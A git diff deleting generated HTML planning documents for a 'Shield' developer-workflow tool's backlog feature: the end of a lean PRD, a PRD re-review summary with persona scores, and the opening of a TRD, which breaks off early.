-<td>Sign-off contacts</td>
-<td><em>(n/a for internal tooling)</em></td>
-</tr>
-<tr>
-<td>Linked plans</td>
-<td><em>(auto-populated by /plan)</em></td>
-</tr>
-</tbody>
-</table>
-<h2 id="2-terminologies">2. Terminologies</h2>
-<table>
-<thead>
-<tr>
-<th>Term</th>
-<th>Definition</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog</td>
-<td>A project-level, ordered list of future work captured across the Shield workflow. Lives at <code>docs/shield/backlog.json</code>.</td>
-</tr>
-<tr>
-<td>Backlog entry</td>
-<td>One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>), a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong> (either may be proposed-new until promotion).</td>
-</tr>
-<tr>
-<td>Feature association</td>
-<td>The feature an entry belongs to (a <code>docs/shield/&lt;feature&gt;/</code> folder). It is the <strong>reconciliation key</strong>: <code>manifest.json</code> is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.</td>
-</tr>
-<tr>
-<td>Epic association</td>
-<td>The epic an entry slots into when planned — an existing epic id (e.g. <code>EPIC-2</code>) or a proposed new epic. Acts as the <strong>gate</strong> at reconciliation: the entry is removed only when this epic's work appears in the feature's <code>plan.json</code>.</td>
-</tr>
-<tr>
-<td>Promotion</td>
-<td>Acting on a backlog entry by starting the appropriate Shield step for it — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. <strong>The user decides which step</strong>; the backlog does not auto-route.</td>
-</tr>
-<tr>
-<td>Reconciliation</td>
-<td>Keeping the backlog current: <code>manifest.json</code> locates the entry's feature and whether it has a <code>plan.json</code>; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's <code>plan.json</code> (<code>epics[].stories[]</code>). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by <strong>epic id</strong>, a proposed-new-epic entry matches by <strong>epic name</strong> (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A <code>prd</code>-only feature does <strong>not</strong> trigger removal. Removal fires at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry, or on the <code>/backlog</code> view sweep.</td>
-</tr>
-<tr>
-<td>Agent-discovered entry</td>
-<td>A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).</td>
-</tr>
-</tbody>
-</table>
-<h2 id="3-problem--context">3. Problem &amp; context</h2>
-<p>Future work surfaces constantly while using Shield — during <code>/research</code>, while writing a PRD, mid-<code>/plan</code>, and especially during <code>/implement</code> (&quot;we should also handle X later&quot;, &quot;this whole area needs a rewrite&quot;). Today there is <strong>nowhere to park that work</strong>. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.</p>
-<p>Concretely:</p>
-<ul>
-<li>There is no project-level, ordered place to capture &quot;not now, but later&quot; items. <code>plan.json</code> only holds work already committed to a milestone; <code>manifest.json</code> is an artifact index. Neither captures un-triaged future work.</li>
-<li>Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.</li>
-<li>When future work <em>is</em> remembered, there's no consistent path from &quot;loose idea&quot; to &quot;stories in a plan.&quot; Each pickup re-derives the epic, the feature, and the scope from scratch.</li>
-</ul>
-<p>Why now: Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) is mature, but it only handles work that's <em>already</em> been decided on. The gap is the staging area <em>before</em> that pipeline — where future work waits, ordered, until the user promotes it in.</p>
-<h2 id="4-target-users--personas">4. Target users / personas</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Persona</th>
-<th>Goals</th>
-<th>Frictions today</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>Ashwini — Shield maintainer running <code>/research</code>/<code>/plan</code>/<code>/implement</code> daily</td>
-<td>Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next</td>
-<td>Future ideas get lost or derail the current task; no ordered &quot;later&quot; list at the project level</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>The agent (Claude) running a Shield task</td>
-<td>Record follow-up work it discovers mid-task so the human doesn't have to remember it</td>
-<td>Discovered work is mentioned once in chat then forgotten; no place to persist it</td>
-</tr>
-</tbody>
-</table>
-<h2 id="5-architecture--flows">5. Architecture &amp; flows</h2>
-<p>A single global store <code>docs/shield/backlog.json</code> (sibling to <code>manifest.json</code>), a <code>/backlog</code> command to view it, a capture path usable from any Shield skill or by the user, and a <strong>user-driven promotion</strong>: the user picks an entry and starts whichever Shield step fits — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. Each entry carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong>. <strong>Reconciliation</strong> reads <code>manifest.json</code> as the project-level index — to find each entry's feature, see whether it has a <code>plan.json</code>, and surface its pipeline status (research/prd/plan) in the <code>/backlog</code> view — then opens the flagged <code>plan.json</code> and removes any entry whose epic's work now appears there. A <code>prd</code>-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via <code>/plan</code> or <code>/implement</code> is pruned at the <strong>end of that run</strong> (the command carries the entry as a transient promotion reference); the <code>/backlog</code> view sweep is the lazy safety net for work that landed without an explicit reference; and a <strong>manual remove</strong> clears ideas decided against or anything not tied to a promotion run.</p>
-<pre class="mermaid">flowchart LR
-  cap[&quot;Capture&lt;br/&gt;(user or agent, anytime)&quot;] --&gt; bl[&quot;backlog.json&lt;br/&gt;(ordered, project-level)&quot;]
-  bl --&gt; view[&quot;/backlog&lt;br/&gt;(ordered list +&lt;br/&gt;per-entry pipeline status)&quot;]
-  man[&quot;manifest.json&lt;br/&gt;(feature index:&lt;br/&gt;research/prd/plan)&quot;] --&gt; view
-  bl --&gt; dec{&quot;User decides&lt;br/&gt;next step&quot;}
-  dec --&gt; research[&quot;/research&quot;]
-  dec --&gt; prd[&quot;/prd&quot;]
-  dec --&gt; plan[&quot;/plan&quot;]
-  dec --&gt; impl[&quot;/implement&quot;]
-  man --&gt; rec[&quot;Reconcile → remove from backlog:&lt;br/&gt;end of promoted /plan or /implement,&lt;br/&gt;or /backlog sweep (work now in plan.json)&quot;]
-  plan --&gt; rec
-  impl --&gt; rec
-  rec --&gt; bl
-</pre>
-<h2 id="6-goals--non-goals">6. Goals &amp; non-goals</h2>
-<h3 id="goals">Goals</h3>
-<ul>
-<li>Capture future work (epic / story / task granularity) at <strong>any point</strong> in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.</li>
-<li>Support <strong>both</strong> capture sources: user-created and agent-discovered.</li>
-<li>Keep the backlog <strong>ordered</strong> so there's a clear &quot;what to pick up next.&quot;</li>
-<li>Every entry is <strong>associated with a feature and an epic</strong> — existing or proposed-new — and the agent <strong>suggests a matching feature/epic</strong> at capture or promotion time.</li>
-<li>A <code>/backlog</code> command <strong>shows the current backlog</strong>, ordered, with each entry's feature + epic association, source, and <strong>pipeline status (research / prd / plan, read from <code>manifest.json</code>)</strong> — so you can see what's been started (e.g. a prd written) without the entry being removed.</li>
-<li>Provide a <strong>user-driven promotion path</strong>: the user picks an entry and starts the Shield step they judge appropriate (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>). The backlog suggests, but does not dictate, the next step.</li>
-<li><strong>Keep the backlog current</strong>: an entry promoted via <code>/plan</code> or <code>/implement</code> is removed at the end of that run; the <code>/backlog</code> view also sweeps out any entry whose work has since landed in a <code>plan.json</code>. The backlog reflects only not-yet-committed work.</li>
-<li><strong>Manual remove</strong>: any entry can be explicitly removed from <code>/backlog</code> — covers ideas decided against and entries not cleared by a promotion run.</li>
-</ul>
-<h3 id="non-goals">Non-goals</h3>
-<ul>
-<li><strong>Automatic end-of-task surfacing machinery</strong> (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.</li>
-<li><strong>Per-feature backlogs.</strong> v1 is a single global backlog.</li>
-<li><strong>A status/workflow engine.</strong> The lifecycle is minimal: an entry exists until it is removed — at the end of the <code>/plan</code> or <code>/implement</code> it was promoted from, by the <code>/backlog</code> sweep once its work is in a <code>plan.json</code>, or manually. No multi-state machine.</li>
-<li><strong>Syncing the backlog to the PM tool</strong> (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing <code>/pm-sync</code> on the resulting plan.</li>
-<li><strong>Replacing the PM tool's own backlog.</strong> This is Shield-local triage, not a project-management backlog of record.</li>
-</ul>
-<h2 id="7-success-metrics">7. Success metrics</h2>
-<table>
-<thead>
-<tr>
-<th>Metric</th>
-<th>Type</th>
-<th>Target</th>
-<th>Counter</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot</td>
-<td>Outcome</td>
-<td>≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; &lt;20% sit untouched &gt;60 days</td>
-<td>Entries pile up un-triaged → backlog becomes a graveyard</td>
-</tr>
-<tr>
-<td>Entries carrying a feature + epic association at promotion time</td>
-<td>Quality</td>
-<td>100% — promotion cannot complete without a feature and epic</td>
-<td>Forcing association makes capture so heavy nobody captures</td>
-</tr>
-<tr>
-<td>Agent feature/epic-suggestion acceptance</td>
-<td>Quality</td>
-<td>≥60% of agent feature/epic suggestions accepted without override</td>
-<td>Bad suggestions that users routinely override</td>
-</tr>
-<tr>
-<td>Capture friction</td>
-<td>Adoption</td>
-<td>Capture is a single <code>/backlog add</code> (or one agent action) and never blocks the current task</td>
-<td>Capture is so quick the backlog fills with low-signal noise</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Measurement (v1):</strong> no telemetry — metrics are tracked manually via a periodic <code>/backlog</code> audit and the git history of <code>backlog.json</code> (entry add/remove commits). Owner: @ashwinimanoj.</p>
-<h2 id="8-milestones">8. Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Exit criteria</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>A global <code>backlog.json</code> exists; entries can be added (user + agent) with order, source, and feature + epic association; <code>/backlog</code> shows the ordered list with per-entry pipeline status from <code>manifest.json</code></td>
-<td><code>backlog.json</code> schema defined; an entry can be captured from a skill or by the user; <code>/backlog</code> renders the ordered backlog with feature + epic and a research/prd/plan status read from <code>manifest.json</code>; an entry can be manually removed from <code>/backlog</code></td>
-<td>—</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic</td>
-<td>Capture prompts for a feature + epic; agent scans <code>manifest.json</code> features and known epics and proposes a match; user can accept, pick another, or create-new</td>
-<td>M1</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>The user picks an entry and starts the Shield step they choose (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>); once the entry's epic's work appears in the feature's <code>plan.json</code>, it is removed from the backlog</td>
-<td>Reconciliation uses <code>manifest.json</code> (find feature, has-plan?) + <code>plan.json</code> (epic present?) — no ids stamped; a <code>prd</code>-only feature is <strong>not</strong> removed; removal fires eagerly at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry and lazily on the <code>/backlog</code> sweep; the user-chosen step is never overridden</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<h2 id="9-open-questions">9. Open questions</h2>
-<h3 id="decided-locked-for-v1">Decided (locked for v1)</h3>
-<ul>
-<li><strong>Reconciliation triggers:</strong> an entry is removed (a) <strong>eagerly</strong> at the end of the <code>/plan</code> or <code>/implement</code> run it was promoted <em>from</em> — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) <strong>lazily</strong> by the <code>/backlog</code> view sweep, which prunes any entry whose epic's work is now in a <code>plan.json</code> (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into <code>plan.json</code>.</li>
-<li><strong>Reconciliation match key:</strong> feature (via <code>manifest.json</code>) + epic. Existing-epic entries match by <strong>epic id</strong>; proposed-new-epic entries match by <strong>epic name</strong> (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.</li>
-<li><strong>Ordering scheme:</strong> a single explicit integer <code>order</code> field per entry (like <code>orderindex</code>); no priority buckets in v1.</li>
-<li><strong>Entry granularity:</strong> entries carry a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>); promotion always yields ≥1 story regardless of <code>kind</code>.</li>
-<li><strong>Shippable work routes through <code>/plan</code>:</strong> anything that produces stories is promoted via <code>/plan</code> so it lands in <code>plan.json</code> (the lazy-sweep signal) and is pruned at the end of that <code>/plan</code> run. Direct <code>/implement</code> stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the <code>/implement</code> run too.</li>
-<li><strong>Manual remove:</strong> <code>/backlog</code> supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.</li>
-</ul>
-<h3 id="still-open">Still open</h3>
-<ul>
-<li><strong>Feature/epic discovery cost.</strong> Epics live inside per-feature <code>plan.json</code>, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged <code>plan.json</code> files; add a project-level epic index only if this gets slow.)</li>
-<li><strong>Dropped/rejected entries.</strong> Do we need an explicit terminal state for &quot;decided against,&quot; or is deleting the entry enough? (Deferred — see §11 Out of scope.)</li>
-</ul>
-<h2 id="10-risks--assumptions">10. Risks &amp; assumptions</h2>
-<h3 id="risks">Risks</h3>
-<table>
-<thead>
-<tr>
-<th>Risk</th>
-<th>Mitigation</th>
-<th>Owner</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog becomes a graveyard (captured, never acted on)</td>
-<td>Reconciliation prunes plan-committed work on <code>/backlog</code> view; periodic audit surfaces stale entries; §7 counter-metric tracks it</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Concurrent writes corrupt <code>backlog.json</code> (capture racing reconciliation)</td>
-<td>Atomic write (temp-then-rename); validate-or-refuse on read; <code>backlog.json</code> is git-tracked so corruption is revertable</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Reconciliation wrongly removes an entry (epic-name collision / ambiguous match)</td>
-<td>Match on feature + epic only; never remove on ambiguity (entry stays); <code>git revert</code> recovers any bad removal</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Capture friction too high → nobody captures</td>
-<td>Single-step capture; agent can capture without prompting</td>
-<td>@ashwinimanoj</td>
-</tr>
-</tbody>
-</table>
-<h3 id="assumptions">Assumptions</h3>
-<ul>
-<li><strong>(unvalidated)</strong> Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.</li>
-<li><strong>(unvalidated)</strong> The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own <code>backlog.json</code> history will validate it.</li>
-<li><strong>(assumed stable)</strong> Epic names in <code>plan.json</code> are stable enough to serve as the proposed-new-epic match key (see §9).</li>
-<li><strong>(validated)</strong> <code>manifest.json</code> is feature-keyed and <code>plan.json</code> carries <code>epics[].stories[]</code> — confirmed against the current schema.</li>
-</ul>
-<h2 id="11-out-of-scope--non-goals">11. Out of scope / Non-goals</h2>
-<ul>
-<li>Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).</li>
-<li><code>/pm-sync</code> of backlog entries to the PM tool before promotion.</li>
-<li>Cross-project / multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).</li>
-</ul>
-<hr />
-<blockquote>
-<p><strong>This is a lean PRD.</strong> It intentionally omits the following standard sections:</p>
-<ul>
-<li>Section 8 — User stories &amp; scenarios</li>
-<li>Section 9 — Functional requirements</li>
-<li>Section 10 — Non-functional requirements</li>
-<li>Section 11 — RBAC &amp; permissions matrix</li>
-<li>Section 12 — Dependencies</li>
-<li>Section 13 — Risks &amp; mitigations</li>
-<li>Section 14 — Assumptions</li>
-<li>Section 15 — Rollout plan (full — lean has its own §8 Milestones)</li>
-<li>Section 16 — Cost &amp; resource impact</li>
-<li>Section 17 — GTM &amp; customer-comms</li>
-<li>Section 18 — Support / CX impact</li>
-</ul>
-<p>If scope grows or stakeholders need more detail, run <code>/prd</code> again — Shield
-will offer to add specific sections or upgrade to <code>standard</code>.</p>
-</blockquote>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html
deleted file mode 100644
index 1cd1edb0..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html
+++ /dev/null
@@ -1,203 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict-ready-composite-31-0-p0s">Verdict: Ready (composite 3.1, 0 P0s)</a>
-<ul>
-<li><a href="#per-dimension-δ-vs-run-1">Per-dimension (Δ vs run 1)</a></li>
-</ul>
-</li>
-<li><a href="#no-p0s-remaining-items-all-non-blocking">No P0s. Remaining items (all non-blocking)</a>
-<ul>
-<li><a href="#p1-3">P1 (3)</a></li>
-<li><a href="#p2-4">P2 (4)</a></li>
-<li><a href="#tech-lead-nfr-notes-informational-lean-exempt--good-plantrd-inputs">Tech-lead NFR notes (informational, lean-exempt — good /plan/TRD inputs)</a></li>
-</ul>
-</li>
-<li><a href="#dx-consistency-check-the-reason-we-re-reviewed">DX consistency check (the reason we re-reviewed)</a>
-</li>
-<li><a href="#recommendation">Recommendation</a>
-</li>
-</ul>
-</nav>
-<h1 id="prd-review--shield-backlog-re-review">PRD Review — Shield Backlog (re-review)</h1>
-<p><strong>Source:</strong> <code>docs/shield/backlog-20260527/prd.md</code> (snapshot: <code>source-prd.md</code>)
-<strong>PRD type:</strong> Lean · <strong>Date:</strong> 2026-05-27 (run _2) · <strong>Reviewers:</strong> 13 dispatches
-<strong>Prior run:</strong> <code>reviews/prd/2026-05-27/</code> — Needs Work (2.7, 1 P0)</p>
-<h2 id="verdict-ready-composite-31-0-p0s">Verdict: <strong>Ready</strong> (composite 3.1, 0 P0s)</h2>
-<p>The P0 is cleared and the edits landed cleanly. Composite rose 2.7 → 3.1; the product-manager persona went C → B as the three flagged dims recovered. One residual contradiction from the rapid editing remains as a P1 (cheap fix), and the capture-from-skill interface is the main thing <code>/plan</code> will need to pin down.</p>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Weight</th>
-<th>Run 1</th>
-<th>Run 2</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>product-manager</td>
-<td>1.0</td>
-<td>C (2.17)</td>
-<td><strong>B (3.33)</strong></td>
-</tr>
-<tr>
-<td>agile-coach</td>
-<td>1.0</td>
-<td>B</td>
-<td><strong>B (3.0)</strong></td>
-</tr>
-<tr>
-<td>tech-lead</td>
-<td>1.0</td>
-<td>Informational</td>
-<td>Informational</td>
-</tr>
-<tr>
-<td>dx-engineer</td>
-<td>0.7</td>
-<td>B</td>
-<td><strong>B (3.0)</strong></td>
-</tr>
-<tr>
-<td>finops-analyst</td>
-<td>0.7</td>
-<td>N/A</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td><strong>Composite</strong></td>
-<td></td>
-<td><strong>2.69</strong></td>
-<td><strong>3.12</strong></td>
-</tr>
-<tr>
-<td><strong>P0s</strong></td>
-<td></td>
-<td>1</td>
-<td><strong>0</strong></td>
-</tr>
-</tbody>
-</table>
-<h3 id="per-dimension-δ-vs-run-1">Per-dimension (Δ vs run 1)</h3>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Run 1 → Run 2</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Problem clarity</td>
-<td>D → <strong>C</strong></td>
-</tr>
-<tr>
-<td>2</td>
-<td>Scope boundaries</td>
-<td>B → <strong>A</strong></td>
-</tr>
-<tr>
-<td>3</td>
-<td>Measurable success</td>
-<td>C → <strong>A</strong></td>
-</tr>
-<tr>
-<td>4</td>
-<td>Scenario coverage &amp; AC</td>
-<td>B → B</td>
-</tr>
-<tr>
-<td>7</td>
-<td>RACI &amp; approvals</td>
-<td>A → A</td>
-</tr>
-<tr>
-<td>11</td>
-<td>Why now</td>
-<td>C → C</td>
-</tr>
-<tr>
-<td>12</td>
-<td>Risks &amp; assumptions</td>
-<td><strong>D → A</strong> (P0 cleared)</td>
-</tr>
-<tr>
-<td>5,6,9,10,13</td>
-<td>(NFR/ops/GTM/CX/cost)</td>
-<td>informational/N/A (lean)</td>
-</tr>
-<tr>
-<td>8</td>
-<td>Legal/privacy</td>
-<td>N/A</td>
-</tr>
-</tbody>
-</table>
-<p><strong>What the fixes resolved:</strong> §10 Risks &amp; assumptions (risks+mitigations+owner, validated/unvalidated tags) cleared the P0 (12a F→A, 12b→A); numeric metric targets + measurement owner (3a/3d) lifted dim 3 C→A; the named persona (1a A) and the why-deferred/scope content lifted dims 1 and 2.</p>
-<hr />
-<h2 id="no-p0s-remaining-items-all-non-blocking">No P0s. Remaining items (all non-blocking)</h2>
-<h3 id="p1-3">P1 (3)</h3>
-<ul>
-<li><strong>P1-1 · §2 residual contradiction (DX).</strong> §2 Epic association still says the entry &quot;is removed <strong>only when</strong> this epic's work appears in <code>plan.json</code>&quot; — but we added a <strong>manual remove</strong> trigger (ideas decided against never hit a plan). Leftover from the earlier gate-only model. → Change &quot;only when&quot; to &quot;when&quot; or add &quot;(or removed manually)&quot;. <em>Cheap, and I introduced it — recommend fixing now.</em></li>
-<li><strong>P1-2 · Capture-from-skill interface undefined (DX).</strong> §5/§8 require capture &quot;usable from any Shield skill&quot; but no command/helper/write-contract is specified. → Define the capture entrypoint (this is the main <code>/plan</code>-level unknown).</li>
-<li><strong>P1-3 · Problem baseline still unquantified (1b, C; 11a/11b, C).</strong> Honestly logged as an unvalidated assumption rather than measured. Acceptable for v1, but a single real figure from past <code>/implement</code> transcripts would harden the &quot;why now.&quot;</li>
-</ul>
-<h3 id="p2-4">P2 (4)</h3>
-<ul>
-<li>§2/§5 eager-removal &quot;promotion reference&quot; mechanism is prose-only (how <code>/plan</code>/<code>/implement</code> receive + act on it). Pin in <code>/plan</code>/TRD.</li>
-<li>State that eager-prune and the <code>/backlog</code> sweep are <strong>idempotent</strong> (remove-if-present) so they can't double-remove or race.</li>
-<li>2c — no explicit scope-creep guard naming the likely creep ask + decision authority.</li>
-<li>7c — sign-off N/A names no confirmer; 3d — audit cadence vague (&quot;periodic&quot;).</li>
-</ul>
-<h3 id="tech-lead-nfr-notes-informational-lean-exempt--good-plantrd-inputs">Tech-lead NFR notes (informational, lean-exempt — good <code>/plan</code>/TRD inputs)</h3>
-<ul>
-<li><strong>Schema versioning (6e):</strong> add <code>schema_version</code> to <code>backlog.json</code> now + a migration policy — cheap at definition, expensive to retrofit.</li>
-<li><strong>Read-contract drift (6f):</strong> reconciliation should treat unrecognized <code>manifest.json</code>/<code>plan.json</code> shapes as &quot;doubt → entry stays,&quot; never crash/guess.</li>
-<li><strong>Perf budget (5a):</strong> state a <code>/backlog</code> sweep budget (e.g. &lt;1s up to ~50 features) to trigger the §9 &quot;add an index if slow&quot; decision.</li>
-<li><strong>Rollback (6c):</strong> name a one-line trigger — if eager prune wrongly removes and git-revert is costly, fall back to manual-remove-only.</li>
-</ul>
-<hr />
-<h2 id="dx-consistency-check-the-reason-we-re-reviewed">DX consistency check (the reason we re-reviewed)</h2>
-<p>The three-trigger removal model is now <strong>consistent across §5, §5-mermaid, §6, §8 M3, and §9</strong> — the earlier &quot;on <code>/backlog</code> view only&quot; wording is fully gone, and the proposed-new-epic match key + &quot;never remove on doubt&quot; invariant are stated consistently in §2/§9/§10. The <strong>only</strong> residual leftover is the §2 &quot;only when&quot; phrasing (P1-1).</p>
-<h2 id="recommendation">Recommendation</h2>
-<p><strong>Ready for <code>/plan</code>.</strong> Optionally fix P1-1 first (one-line, mine to fix) and decide the capture interface (P1-2) — though that one is legitimately <code>/plan</code>/TRD-level. The tech-lead schema-versioning + read-contract notes should be carried into the TRD.</p>
-<p><em>Files: <code>summary.md</code> · <code>enhanced-prd.md</code> · <code>review-comments.json</code> · <code>detailed/*.md</code> ×5.</em></p>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/trd.html b/docs/shield/backlog-20260527/outputs/trd.html
deleted file mode 100644
index 1aea5509..00000000
--- a/docs/shield/backlog-20260527/outputs/trd.html
+++ /dev/null
@@ -1,531 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>TRD — backlog-20260527</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#1-document-overview-document-overview">§1 Document Overview {#document-overview}</a>
-</li>
-<li><a href="#2-problem-statement-problem-statement">§2 Problem Statement {#problem-statement}</a>
-</li>
-<li><a href="#3-objective--scope-objective-scope">§3 Objective &amp; Scope {#objective-scope}</a>
-</li>
-<li><a href="#4-product-journey-product-journey">§4 Product Journey {#product-journey}</a>
-</li>
-<li><a href="#5-functional-requirements-functional-requirements">§5 Functional Requirements {#functional-requirements}</a>
-</li>
-<li><a href="#6-non-functional-requirements-non-functional-requirements">§6 Non-Functional Requirements {#non-functional-requirements}</a>
-</li>
-<li><a href="#7-high-level-design-high-level-design">§7 High-Level Design {#high-level-design}</a>
-</li>
-<li><a href="#8-alternatives-considered-alternatives-considered">§8 Alternatives Considered {#alternatives-considered}</a>
-</li>
-<li><a href="#9-cross-cutting-concerns-cross-cutting-concerns">§9 Cross-Cutting Concerns {#cross-cutting-concerns}</a>
-</li>
-<li><a href="#10-milestones-milestones">§10 Milestones {#milestones}</a>
-<ul>
-<li><a href="#m1--capture--store--view--no-deps">M1 — Capture + store + view  (no deps)</a></li>
-<li><a href="#m2--feature--epic-association--suggestion--deps-m1">M2 — Feature + epic association + suggestion  (deps M1)</a></li>
-<li><a href="#m3--promotion--reconciliation--deps-m2">M3 — Promotion + reconciliation  (deps M2)</a></li>
-</ul>
-</li>
-<li><a href="#11-apis-involved-apis-involved">§11 APIs Involved {#apis-involved}</a>
-<ul>
-<li><a href="#backlogjson-document-shape">backlog.json document shape</a></li>
-<li><a href="#backlog_store-write-helper-locked--plan-review-2026-05-27">backlog_store write helper (LOCKED — plan-review 2026-05-27)</a></li>
-<li><a href="#cli-surface-backlog">CLI surface (/backlog)</a></li>
-<li><a href="#manifestjson-read-contract-consumed-not-owned">manifest.json read-contract (consumed, not owned)</a></li>
-<li><a href="#reconciler-engine-entry-point">reconciler engine entry point</a></li>
-</ul>
-</li>
-<li><a href="#12-open-questions-open-questions">§12 Open Questions {#open-questions}</a>
-</li>
-<li><a href="#13-references-references">§13 References {#references}</a>
-</li>
-<li><a href="#14-rollback-strategy-rollback-strategy">§14 Rollback Strategy {#rollback-strategy}</a>
-</li>
-</ul>
-</nav>
-<!-- generated by /plan v2.21.0 on 2026-05-29 -->
-<h1 id="trd--shield-backlog">TRD — Shield Backlog</h1>
-<blockquote>
